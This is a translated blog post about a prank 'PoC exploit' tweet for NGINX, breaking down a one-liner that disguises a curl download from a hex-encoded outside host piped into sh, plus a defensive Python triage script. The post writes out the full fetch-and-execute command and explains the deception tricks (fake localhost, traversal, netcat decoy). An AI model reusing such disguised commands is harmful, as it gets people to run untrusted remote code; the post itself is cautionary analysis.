Translator's note:
TL;DR: Never pipe anything into sh or bash, under any circumstances. It is a great way to lose control of your computer.
I want to tell you a short story about the joke PoC exploit that was created on May 31st. It appeared as an immediate reaction to the news from
After finishing work on the new obfuscation trick in curl, I referred to the original tweet and to a "working PoC" consisting of a single line of code that supposedly exploited the discovered vulnerability. Of course, this was not true. I expected to be exposed right away, and thought that at best I would get a couple of retweets (oh well).
However, I could not have imagined what happened next. It became my most popular tweet. Surprisingly, by then (15:00 Moscow time on June 1) only a few people had noticed that it was fake. Many retweeted it without checking it at all (let alone admiring the beautiful ASCII art it prints).
Just look at how beautiful it is!
While all these circles and colours look great, the fact is that people had to run code on their machines to see them. Fortunately, a browser does the same thing, and since I really did not want to get into legal trouble, the code hidden on my site only makes a request and does not try to install or execute any other code.
A small digression:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Socio-electronic engineering (SEE): more than just phishing
Safety and familiarity are an important part of this experiment. I think they are what made it successful. The command line explicitly signals safety by referring to "127.0.0.1" (the well-known localhost). Localhost is considered safe, and data on it never leaves your computer.
Familiarity is the second important SEE component of the experiment. Since the target audience mostly consists of people who know the basics of computer security, it is important to craft the code so that parts of it look familiar and well known (and therefore safe). Borrowing elements of old exploit concepts and combining them in unusual ways proved very effective.
Below is a detailed breakdown of the one-liner. Everything in this list is purely cosmetic, and practically none of it is needed for it to actually work.
Which elements are really needed? These: -gsS, -O 0x0238f06a, |sh and the web server itself. The web server contains no malicious instructions; it only draws the ASCII art with echo commands in a script stored in index.html. When the user enters the line with |sh in the middle, index.html is loaded and executed. Luckily, the administrators of that web server had no malicious intent.
- ../../../%00 - stands for directory traversal;
- ngx_stream_module.so - a path to a random NGINX module;
- /bin/sh%00<'protocol:TCP' - we are supposedly launching /bin/sh on the target machine and redirecting its output to a TCP channel;
- -O 0x0238f06a#PLToffset - the hidden gem, with #PLToffset added so that it looks like a memory offset of something in the PLT;
- |sh; - the other essential part. We must redirect the output to sh/bash in order to execute the code from the attacking web server located at 0x0238f06a (2.56.240.x);
- nc /dev/tcp/localhost - a dummy in which netcat refers to /dev/tcp/localhost so that everything looks safer. In reality it does nothing and is included in the line for beauty.
This concludes the breakdown of the one-liner and the discussion of "socio-electronic engineering" (intricate phishing).
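The breakdown above can be done mechanically. As an added example (not code from the post or from the one-liner's author), here is a Python triage script that splits the command the way a POSIX shell would, lists the URLs curl will actually request, decodes numeric hosts such as 0x0238f06a the way inet_aton does (hex, octal and decimal forms, one to four parts), and reports whether curl's stdout ends up in a shell. The one-liner is embedded as the sample input; the table of curl options that take an argument is a partial one of my own, and the pairing rule (curl matches -o/-O options with URLs in order, leftover URLs go to stdout) is what the output decision relies on.

```python
"""Triage a 'curl ... | sh' one-liner without running it (added example, not the post's own code)."""
import shlex
from urllib.parse import urlsplit
SHELLS = {"sh", "bash", "zsh", "dash", "ksh"}
CMD_SEPARATORS, REDIRECTS = {";", "&&", "||", "&"}, {"<", ">", ">>", "&>"}
# Partial table (an assumption of this example) of curl options that consume the next argument.
CURL_OPTS_WITH_ARG = {"-o", "--output", "-d", "--data", "-H", "--header", "-X", "--request", "-u",
                      "--user", "-A", "--user-agent", "-e", "--referer", "-b", "--cookie", "-x", "--proxy"}
CURL_OUTPUT_OPTS = {"-o", "--output", "-O", "--remote-name"}
ONE_LINER = (  # the one-liner from the post, used here as the sample input
    "curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler"
    "?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00"
    "<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost")

def tokenize(cmd):
    """Split like a POSIX shell: quotes are honoured and | ; & < > become their own tokens."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    lex.commenters = ""  # to a shell, '#' inside a word (0x0238f06a#PLToffset) is not a comment
    return list(lex)

def parse_commands(tokens):
    """Group tokens into pipelines (split on ; && || &); each pipeline is a list of argv lists."""
    commands, pipeline, argv, skip_next = [], [], [], False
    for tok in tokens:
        if skip_next:                      # the file name after a redirection operator
            skip_next = False
        elif tok in REDIRECTS:
            skip_next = True
        elif tok == "|" or tok in CMD_SEPARATORS:
            pipeline, argv = pipeline + [argv], []
            if tok != "|":
                commands, pipeline = commands + [pipeline], []
        else:
            argv.append(tok)
    commands.append(pipeline + [argv])
    return [[a for a in p if a] for p in commands if any(p)]

def curl_requests(argv):
    """Return (urls, number of -o/-O style output options) from a curl argv."""
    urls, n_out, i = [], 0, 1
    while i < len(argv):
        tok = argv[i]
        if tok in CURL_OPTS_WITH_ARG:
            n_out += int(tok in CURL_OUTPUT_OPTS)   # -o / --output name an output file
            i += 2
        elif tok.startswith("-") and len(tok) > 1:
            # -O, --remote-name, or an O inside a bundle of short options such as -sO
            n_out += int(tok in CURL_OUTPUT_OPTS or (tok[1] != "-" and "O" in tok[1:]))
            i += 1
        else:
            urls.append(tok)               # anything that is not an option is a URL
            i += 1
    return urls, n_out

def url_host(url):
    """Host as curl sees it: a bare host gets http:// and the #fragment is dropped."""
    return urlsplit(url if "://" in url else "http://" + url).hostname or ""

def _c_number(text):
    """One dotted-quad component with inet_aton rules: 0x hex, leading-0 octal, else decimal."""
    try:
        if text[:2].lower() == "0x":
            return int(text[2:], 16)
        if len(text) > 1 and text[0] == "0":
            return int(text, 8)
        return int(text) if text.isdigit() else None
    except ValueError:
        return None

def inet_aton_like(host):
    """Dotted quad for the 1- to 4-part numeric host forms inet_aton accepts, else None."""
    parts = [_c_number(p) for p in host.split(".")]
    if not 1 <= len(parts) <= 4 or any(v is None for v in parts):
        return None
    *lead, last = parts
    if any(v > 255 for v in lead) or last >= 256 ** (4 - len(lead)):
        return None
    n = last                               # the last part fills all remaining bytes
    for shift, v in enumerate(reversed(lead)):
        n |= v << (8 * (4 - len(lead) + shift))
    return ".".join(str((n >> s) & 255) for s in (24, 16, 8, 0))

def triage(cmd):
    """For each curl stage: its URLs, decoded hosts, what goes to stdout, and whether a shell reads it."""
    findings = []
    for pipeline in parse_commands(tokenize(cmd)):
        for pos, argv in enumerate(pipeline):
            if argv[0] != "curl":
                continue
            urls, n_out = curl_requests(argv)
            findings.append({
                "urls": urls,
                "hosts": {u: (url_host(u), inet_aton_like(url_host(u))) for u in urls},
                # curl pairs -o/-O options with URLs in order; any URL left over goes to stdout
                "urls_to_stdout": urls[n_out:],
                "piped_to_shell": any(stage[0] in SHELLS for stage in pipeline[pos + 1:]),
            })
    return findings
```

Running `triage(ONE_LINER)` shows the point of the breakdown in one dictionary: two URLs, one -O, so the second URL (host 0x0238f06a, which is 2.56.240.106 in dotted form) is the one whose body reaches stdout, and the next pipeline stage is sh. The localhost reference, the traversal, the module path and the netcat tail never enter into it.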
Web Server Configuration and Countermeasures
Since most of my followers are infosec people and hackers, I decided to make the web server a little resistant to their "favourite" attacks, just so the guys would have something to do (and it was fun to set up). I won't list all the pitfalls here, since the experiment is still ongoing, but here are a few things the server does:
- Monitors how it spreads across certain forums and changes various previews in advance to encourage users to click on the link.
- Redirects Chrome/Mozilla/Safari/etc. to the Thugcrowd promotional video instead of showing the shell script.
- Looks for OBVIOUS signs of intrusion / blatant hacking, and then starts redirecting the requests to NSA servers (ha!).
- Installs a Trojan, along with a BIOS rootkit, on every computer from which a user visits the host with a regular browser (just kidding!).
A little about countermeasures
In this case, my only goal was to learn a few things about Apache, specifically its neat request-rewriting rules, and I thought: why not?
NGINX Exploit (Real!)
Stay tuned.
Source: www.hab.com